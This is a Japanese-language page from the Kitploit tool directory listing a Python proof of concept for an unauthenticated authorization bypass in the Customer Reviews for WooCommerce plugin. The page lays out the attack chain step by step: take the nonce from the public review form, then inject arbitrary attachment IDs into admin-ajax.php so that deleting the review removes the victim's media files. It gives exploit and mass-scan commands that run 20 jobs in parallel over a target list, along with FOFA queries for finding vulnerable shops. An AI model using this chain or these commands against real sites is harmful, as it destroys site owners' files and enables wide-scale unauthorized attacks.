Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-89055 — PythonによるCVE-2026-89055のチェック/エクスプロイトPoC。これはCustomer Reviews for WooCommerceにおける未認証の認可バイパスであり、攻撃者が任意のMedia Library添付ファイルを削除対象としてリンクできるようにするものです。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-89055
偵察脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmurrez/cve-2026-89055

CVE-2026-89055

PythonによるCVE-2026-89055のチェック/エクスプロイトPoC。これはCustomer Reviews for WooCommerceにおける未認証の認可バイパスであり、攻撃者が任意のMedia Library添付ファイルを削除対象としてリンクできるようにするものです。

リポジトリを見る
9時間19分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-89055 — Customer Reviews for WooCommerce (CusRev) 認可バイパス

Customer Reviews for WooCommerce(customer-reviews-woocommerce / Ivole CusRev)における CVE-2026-89055 の Python 3 PoC。

説明 (PoCbit / GitHub)

CVE-2026-89055 — Customer Reviews for WooCommerce (CusRev) ≤ 5.120.0 は、公開されている ローカルレビューフォーム の AJAX ハンドラー(cr_local_forms_submit)において 認可の欠如 の脆弱性があります。カスタマーレビューリンク(注文後メールに記載の /cusrev/{13-hex formId}/)を持つ誰でも、有効な crSubmitNonce を取得し、items[].media 配列に 任意のメディアライブラリアタッチメント ID(商品画像、ロゴ、PDF など)を含むレビューを送信できます。これらの ID はレビューコメントメタに保存され、レビューが 完全に削除(ゴミ箱からの完全削除 / スパムクリーンアップ)されると、delete_review_media_attachments() が各リンクされた ID に対して 所有権チェックなしで wp_delete_attachment() を呼び出します。CVSS 3.1 9.1 Critical(C:N/I:H/A:H)。> 5.120.0 で修正済み。

PoCbit

コミュニティカタログ: https://pocbit.org/pocs/

攻撃チェーン

  1. {site}/cusrev/{formId}/ を開く → crSubmitNonce と商品の data-itemid 値を読み取る。
  2. admin-ajax.php に POST: action=cr_local_forms_submit と items[n][media][]=<victim_attachment_id> を送信。
  3. プラグインが WooCommerce レビューコメントメタ(ivole_reviews_locl_img / video)を作成/更新。
  4. レビューコメントが 完全に削除 されると、フックされた delete_review_media_attachments がリンクされたすべてのアタッチメントファイルを削除。

この PoC は、許可されたターゲットに対してステップ 1〜2 を実行します。ステップ 4 はサイト/管理者のライフサイクルイベントです(出力に chain_note として記載)。

要件

root@kitploit:~
pip install -r requirements.txt

Python 3.8+。

使用方法

root@kitploit:~
# Plugin version + optional live form (nonce + item IDs)
python poc.py -u https://shop.example --mode check --form-url /cusrev/abc123def4567/

# Inject foreign attachment ID into first product line item
python poc.py -u https://shop.example --mode exploit \
  --form-id abc123def4567 --attachment-id 123 \
  --verify-url https://shop.example/wp-content/uploads/2026/01/product.jpg

# Mass: base URL per line, optional form path after |
python poc.py --list targets.example.txt --mode check -j 20 --quiet

出力

ファイル意味
cve_2026_89055_results.jsonlターゲットごとの JSON
hits.txt候補またはエクスプロイトマーカー
candidates.jsonlフォームリンクが必要なプラグイン脆弱ホスト

FOFA

root@kitploit:~
body="/wp-content/plugins/customer-reviews-woocommerce/"
body="/cusrev/"

法的注意

許可されたテストのみ。

ツールをダウンロード
プラットフォームWordPress + WooCommerce
プラグインCustomer Reviews for WooCommerce
影響を受けるバージョン≤ 5.120.0
CWECWE-862 (Missing Authorization)
前提条件公開 /cusrev/{formId}/ リンク(ページ上の nonce)
影響レビュー削除後の任意の メディア削除(完全性 + 可用性)